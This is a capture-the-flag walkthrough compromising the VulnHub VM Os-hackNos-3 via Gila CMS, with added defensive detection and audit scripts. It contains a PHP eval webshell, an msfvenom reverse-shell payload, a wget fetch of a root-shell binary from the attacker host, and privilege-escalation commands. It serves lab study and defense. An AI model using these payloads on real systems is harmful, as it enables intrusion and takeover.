kali ip:192.168.1.193
target ip:192.168.1.202
Target VM download: hackNos: Os-hackNos-3 ~ VulnHub
Goal: the normal user's user.txt and the root user's root.txt
Step 1: use nmap to scan the network, find the target 192.168.1.202, and gather information on it for the break-in...

```shell
nmap -sn 192.168.1.0/24
nmap -sS -A -T5 192.168.1.202 -O
```
Step 2: use gobuster to run a directory scan against the site; the /scripts/ path was found and visited, but it offers no real exploitation point...

```shell
gobuster dir -u http://192.168.1.202/ -w /home/flao/桌面/wordlist.list -x .php,.zip,.txt,.html
```
Step 3: after visiting those files without result, back on the site's home page the text "You need extra WebSec" appears. Appending the path /websec/ to the site reveals a CMS; a scanner found the backend login page /websec/admin, and the page title reads "Gila CMS". Searching shows it is an open-source CMS...
Step 4: search for known vulnerabilities in Gila CMS; the following two turn up. The file-inclusion vulnerability requires being logged in to the backend, so the next idea is to try brute-forcing a weak password....
- Gila CMS < 1.11.1 - Local File Inclusion - Multiple webapps Exploit # file inclusion
- Gila CMS 1.9.1 - Cross-Site Scripting - PHP webapps Exploit # XSS cross-site scripting
Step 5: use cewl to collect words from the site and build a password list from them...

```shell
cewl http://192.168.1.202/websec/ > passwd.txt
```
Step 6: use the e-mail address on the site's home page as the username and passwd.txt as the password list, and brute-force the backend login with Burp Suite with a delay between attempts.... Result: contact@hacknos.com:SecurityX
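From the defender's side, both the gobuster scan in step 2 and the Burp Suite login brute-force in step 6 are loud in the web server's access log: a burst of 404s from one address, then a burst of POSTs to /websec/admin. The following added example (my code, not from the walkthrough or from Gila CMS) runs a sliding-window detector over constructed Apache combined-format log lines modelled on those two steps; the 60-second window and the 20/10 thresholds are assumptions to tune per site.

```python
"""Spot directory brute-forcing and login brute-forcing in Apache access logs.

Added example, not part of the original walkthrough or of Gila CMS. The log lines
are constructed to resemble what the gobuster scan (step 2) and the Burp Suite
login brute-force (step 6) would leave behind; the login path /websec/admin is
taken from the walkthrough, the thresholds and window are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window=timedelta(seconds=60), scan_404s=20,
           login_posts=10, login_path="/websec/admin"):
    """Sliding-window detector keyed by source IP.

    Emits ('dir_scan', ip, n) when n >= scan_404s responses with status 404
    fall inside `window`, and ('login_bruteforce', ip, n) when n >= login_posts
    POSTs to `login_path` do. Each (kind, ip) pair fires once.
    """
    recent = defaultdict(deque)   # (kind, ip) -> timestamps still inside the window
    fired = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            kind, threshold = "dir_scan", scan_404s
        elif rec["method"] == "POST" and rec["path"].startswith(login_path):
            kind, threshold = "login_bruteforce", login_posts
        else:
            continue
        key = (kind, rec["ip"])
        q = recent[key]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # expire events older than the window
            q.popleft()
        if len(q) >= threshold and key not in fired:
            fired.add(key)
            alerts.append((kind, rec["ip"], len(q)))
    return alerts


def sample_log():
    """Constructed sample: 25 one-second-spaced 404s from a scanner, a few normal
    requests from another client, then 12 rapid POSTs to the login page."""
    base = datetime(2022, 2, 22, 12, 0, 0, tzinfo=timezone.utc)

    def at(sec):
        return (base + timedelta(seconds=sec)).strftime(TS_FMT)

    lines = [
        f'192.168.1.193 - - [{at(i)}] "GET /word{i}.php HTTP/1.1" 404 275 "-" "gobuster/3.1.0"'
        for i in range(25)
    ]
    lines += [
        f'192.168.1.50 - - [{at(30 + i)}] "GET /websec/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"'
        for i in range(3)
    ]
    # A failed Gila login is assumed to answer 200, so the rule keys on method and path.
    lines += [
        f'192.168.1.193 - - [{at(40 + i)}] "POST /websec/admin HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'
        for i in range(12)
    ]
    return lines


if __name__ == "__main__":
    for kind, ip, n in detect(sample_log()):
        print(f"{kind}: {ip} ({n} events in window)")
```

Run it as a script to print the two alerts, or feed `detect()` real lines from access.log. Because a failed CMS login often returns HTTP 200, the login rule counts POSTs to the login path rather than error statuses; the per-IP deque keeps memory bounded to the window.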
Step 7: once in the backend, try to get a shell. Under Content >> Media images can be uploaded, and under Content >> File Manager PHP files can be edited.... In Content >> File Manager, enter the tmp directory, edit the .htaccess file, delete all of its contents and click Save, then go into the tmp/media_thumb/ directory, upload a one-line webshell, visit it and connect with AntSword...

```php
<?php @eval($_POST['z4pts']);?>
```
http://192.168.1.98/websec/tmp/media_thumb/test.php
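The decisive move in step 7 is not the upload itself but emptying tmp/.htaccess, which removes whatever kept PHP from executing in the media directories. The following added example (mine, not code from the walkthrough or from Gila CMS) audits an upload tree for exactly that state: it checks the directory's .htaccess for a PHP-denying directive, flags PHP-executable files below it, and flags image-named files whose first bytes are a PHP open tag. It assumes Apache with mod_php and an AllowOverride that honours those directives; the tmp/media_thumb layout in the constructed demo mirrors the walkthrough.

```python
"""Audit an upload directory for the condition step 7 exploits: a directory
the web server will hand to the PHP engine.

Added example, not code from the walkthrough or from Gila CMS. Assumes Apache
with mod_php and an AllowOverride that honours the directives checked below;
the tmp/media_thumb layout and the emptied .htaccess mirror the walkthrough.
"""
import os
import re
import tempfile

PHP_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".webp"}

# Any one of these directives in .htaccess stops PHP execution in the directory
# (and its subdirectories, unless a deeper .htaccess overrides it).
DENY_PATTERNS = [
    re.compile(r"^\s*php_flag\s+engine\s+off\b", re.I | re.M),
    re.compile(r"^\s*RemoveHandler\b[^\n]*\.php", re.I | re.M),
    re.compile(r"^\s*SetHandler\s+none\b", re.I | re.M),
    re.compile(r"<FilesMatch[^>]*php[^>]*>[^<]*(Require\s+all\s+denied|Deny\s+from\s+all)", re.I),
]

# One hardened .htaccess for an upload directory (illustrative).
HARDENED_HTACCESS = (
    "php_flag engine off\n"
    "RemoveHandler .php .phtml .phar\n"
    '<FilesMatch "\\.(php|phtml|phar)$">\n'
    "    Require all denied\n"
    "</FilesMatch>\n"
)


def htaccess_denies_php(path):
    """True if the .htaccess at `path` exists and carries a PHP-denying directive."""
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            text = f.read()
    except FileNotFoundError:
        return False
    return any(p.search(text) for p in DENY_PATTERNS)


def audit_upload_dir(root):
    """Return findings as (severity, path, message) for the upload tree at `root`."""
    findings = []
    ht = os.path.join(root, ".htaccess")
    if not os.path.exists(ht):
        findings.append(("high", ht, "missing .htaccess: uploaded PHP would execute"))
    elif not htaccess_denies_php(ht):
        findings.append(("high", ht, ".htaccess present but does not deny PHP execution"))
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in PHP_EXTS:
                findings.append(("critical", p, "PHP file inside upload directory"))
            elif ext in IMAGE_EXTS:
                with open(p, "rb") as f:
                    head = f.read(64)
                if head.lstrip().startswith((b"<?php", b"<?=")):
                    findings.append(("high", p, "image-named file begins with PHP code"))
    return findings


def _build_tree(base, htaccess_text, with_php_file):
    """Constructed tree: tmp/.htaccess plus tmp/media_thumb/ holding a real PNG
    header and, optionally, a PHP placeholder standing in for the uploaded file."""
    tmp = os.path.join(base, "tmp")
    thumb = os.path.join(tmp, "media_thumb")
    os.makedirs(thumb)
    with open(os.path.join(tmp, ".htaccess"), "w") as f:
        f.write(htaccess_text)
    with open(os.path.join(thumb, "gila-logo.png"), "wb") as f:
        f.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)     # genuine PNG signature
    if with_php_file:
        with open(os.path.join(thumb, "test.php"), "w") as f:
            f.write("<?php /* constructed placeholder, not a shell */ ?>\n")
    return tmp


def demo_weak():
    """State after step 7: emptied .htaccess and a PHP file in media_thumb."""
    with tempfile.TemporaryDirectory() as base:
        return audit_upload_dir(_build_tree(base, "", True))


def demo_hardened():
    """Same tree with the hardened .htaccess and no PHP file: expect no findings."""
    with tempfile.TemporaryDirectory() as base:
        return audit_upload_dir(_build_tree(base, HARDENED_HTACCESS, False))


if __name__ == "__main__":
    for sev, path, msg in demo_weak():
        print(f"[{sev}] {path}: {msg}")
    print("hardened findings:", demo_hardened())
```

Point `audit_upload_dir()` at the real upload root as a deployment check or from a scheduled job. `HARDENED_HTACCESS` is one configuration that makes the audit pass; keeping that file outside what the CMS File Manager can edit, or making it non-writable by the web server user, is what removes the step-7 path.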
Step 8: connect with AntSword and upload the shell file generated by msf... start msfconsole in Kali, enter listening mode, then open shell.php in the browser to trigger the reverse shell....

```shell
# Generate the PHP payload with MSF
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.193 LPORT=1234 R > shell.php
chmod 777 shell.php
# Start msfconsole in Kali to receive the reverse shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.193
set LPORT 1234
```
Step 9: in meterpreter, type the shell command to enter the target's shell and run the following command to get a bash environment....

```shell
python -c 'import pty; pty.spawn("/bin/bash")'
```
Step 10: compile the following source code, upload it to a directory on the target, give it 777 permissions and run it to obtain elevated privileges... then grab the flag...

```c
#include <stdio.h>
#include <stdlib.h>     /* declares system(); it was missing originally, hence gcc's implicit-declaration warning */
#include <unistd.h>
#include <sys/types.h>

int main() {
    setuid(0);          /* only succeeds when the process already runs with root privileges */
    setgid(0);
    system("/bin/bash");
    return 0;
}
```

```shell
# Compilation on Kali
root@kali:~# gcc exp.c -o exp
luci11.c: In function ‘main’:
luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
    9 |   system("/bin/bash");
      |   ^~~~~~
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8080 ...
```

```shell
# Operations on the target VM
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ wget http://192.168.1.193:8080/exp -O exp
--2022-02-22 12:48:35--  http://192.168.1.193:8080/exp
Connecting to 192.168.1.193:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16224 (16K) [application/octet-stream]
Saving to: 'exp'

exp                 100%[===================>]  15.84K  --.-KB/s    in 0s

2022-02-22 12:48:35 (428 MB/s) - 'exp' saved [16224/16224]

www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ ls
assetsgila-logo.png  exp  flao.php  shell.php
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ whoami
www-data
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ chmod 777 exp
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cpulimit -l 100 -f ./exp
Process 3771 detected
root@hacknos:/var/www/html/websec/tmp/media_thumb# whoami
root
root@hacknos:/var/www/html/websec/tmp/media_thumb# cd /root
root@hacknos:/root# ls
root.txt  snap
root@hacknos:/root# cat root.txt
```
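Step 10 only works because a non-root user can run something that hands out root: the `cpulimit -l 100 -f ./exp` line runs the uploaded program as root, which is consistent with cpulimit carrying the setuid bit (an inference; the page does not state it). The following added example (mine, not the walkthrough's code) audits a host's setuid-root binaries against a baseline and also lists world-writable executables such as the `chmod 777 exp` left in the web root. The baseline is an illustrative Debian/Ubuntu set and the file snapshot is constructed; on a real host, replace both with `scan_filesystem()` output and the host's own golden-image baseline.

```python
"""Audit setuid-root binaries against a baseline, plus world-writable executables.

Added example, not code from the walkthrough. The constructed snapshot models the
step-10 host: standard setuid binaries, a setuid-root cpulimit (inferred from the
walkthrough's cpulimit run yielding a root shell; the page does not say so), and
the 777-mode exp file in the web root. The baseline is an illustrative
Debian/Ubuntu list, an assumption to replace with a host's own.
"""
import os
import stat

BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}


def is_setuid_root(mode, uid):
    """Setuid bit set and the file owned by uid 0."""
    return bool(mode & stat.S_ISUID) and uid == 0


def unexpected_setuid(entries, baseline=BASELINE):
    """entries: iterable of (path, mode, uid). Return the sorted paths that are
    setuid-root but absent from the baseline; each one needs a justification."""
    return sorted(p for p, mode, uid in entries
                  if is_setuid_root(mode, uid) and p not in baseline)


def world_writable_executables(entries):
    """Files anyone can both modify and execute (the 777 pattern from step 10)."""
    return sorted(p for p, mode, _uid in entries
                  if mode & stat.S_IWOTH and mode & stat.S_IXOTH)


def scan_filesystem(root="/"):
    """Live collection of (path, mode, uid) for regular files; skips pseudo-filesystems."""
    skip = {"/proc", "/sys", "/dev", "/run"}
    out = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in skip:
            dirnames[:] = []
            continue
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                out.append((p, st.st_mode, st.st_uid))
    return out


def sample_entries():
    """Constructed snapshot modelled on the step-10 host (see module docstring)."""
    reg = stat.S_IFREG
    return [
        ("/usr/bin/passwd", reg | stat.S_ISUID | 0o755, 0),
        ("/usr/bin/sudo", reg | stat.S_ISUID | 0o755, 0),
        ("/usr/bin/cpulimit", reg | stat.S_ISUID | 0o755, 0),           # setuid-root, not in baseline
        ("/usr/bin/python3", reg | 0o755, 0),
        ("/var/www/html/websec/tmp/media_thumb/exp", reg | 0o777, 33),  # chmod 777 exp by www-data
        ("/home/blackdevil/tool", reg | stat.S_ISUID | 0o755, 1000),    # setuid, but not root-owned
    ]


if __name__ == "__main__":
    entries = sample_entries()      # use scan_filesystem() on a live host
    print("unexpected setuid-root:", unexpected_setuid(entries))
    print("world-writable executables:", world_writable_executables(entries))
```

Running the audit periodically and diffing against the previous run turns a one-off check into detection: a setuid bit appearing on a binary that never had one, or a 777 file showing up under the web root, is exactly the change this session produced.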
### Second privilege escalation method:
- Switching to the /home directory reveals a user account blackdevil
- The file /var/local/database contains an encrypted value
- Decrypting it yields blackdevil's password; use su to switch to that user
- sudo -l shows the sudo permission is ALL, so running sudo su directly gives root..

```shell
www-data@hacknos:/var/www/html/websec/tmp/media_thumb$ cd /home
www-data@hacknos:/home$ ls
blackdevil
www-data@hacknos:/home$ cd /var/local
www-data@hacknos:/var/local$ ls
database
www-data@hacknos:/var/local$ cat database
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
www-data@hacknos:/var/local$ su blackdevil
Password: Security@x@
blackdevil@hacknos:/var/local$ sudo -l
[sudo] password for blackdevil: Security@x@
Matching Defaults entries for blackdevil on hacknos:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blackdevil may run the following commands on hacknos:
    (ALL : ALL) ALL
blackdevil@hacknos:/var/local$ sudo su
root@hacknos:/var/local# whoami
root
root@hacknos:/var/local#
```
### References: